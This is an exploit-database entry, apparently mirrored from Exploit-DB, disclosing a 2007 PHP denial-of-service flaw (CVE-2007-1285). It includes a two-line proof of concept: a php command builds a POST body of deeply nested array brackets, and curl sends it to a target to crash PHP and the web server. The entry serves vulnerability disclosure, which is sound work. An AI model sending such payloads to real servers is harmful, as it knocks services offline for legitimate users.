- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29692
- Проверка EDB
-
- Пройдено
- Автор
- STEFAN ESSER
- Тип уязвимости
- DOS
- Платформа
- PHP
- CVE
- cve-2007-1285
- Дата публикации
- 2007-03-01
PHP 3/4/5 - ZendEngine Variable Destruction Remote Denial of Service
Код:
source: https://www.securityfocus.com/bid/22764/info
PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.
An attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.
This issue affects all versions of PHP.
$ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata
$ curl http://www.example.com/ -d @postdata- Источник
- www.exploit-db.com
